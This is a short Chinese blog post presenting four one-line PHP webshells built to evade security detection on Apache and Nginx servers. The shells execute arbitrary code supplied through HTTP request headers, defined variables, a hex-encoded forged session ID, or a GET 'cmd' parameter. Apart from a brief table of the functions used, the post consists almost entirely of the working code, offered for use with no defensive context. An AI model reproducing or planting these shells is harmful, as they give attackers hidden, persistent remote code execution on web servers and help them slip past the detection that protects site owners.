PHP利用Apache、Nginx的特性实现免杀Webshell

Jieen 2019-12-30

环境函数用法
nginxget_defined_vars()返回由所有已定义变量所组成的数组
apachegetallheaders()获取全部 HTTP 请求头信息

apache环境

 
1
2
3
<?php
eval(next(getallheaders()));
?>
PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

 
1
2
3
<?php
eval(implode(reset(get_defined_vars())));
?>

PHP利用Apache、Nginx的特性实现免杀Webshell

另外一种通过执行伪造的sessionid值,进行任意代码执行。

 
1
2
3
<?php
eval(hex2bin(session_id(session_start())));
?>
PHP利用Apache、Nginx的特性实现免杀Webshell

webshell加密码

 
1
<?php eval(get_defined_vars()[‘_GET‘][‘cmd‘]);?>

相关推荐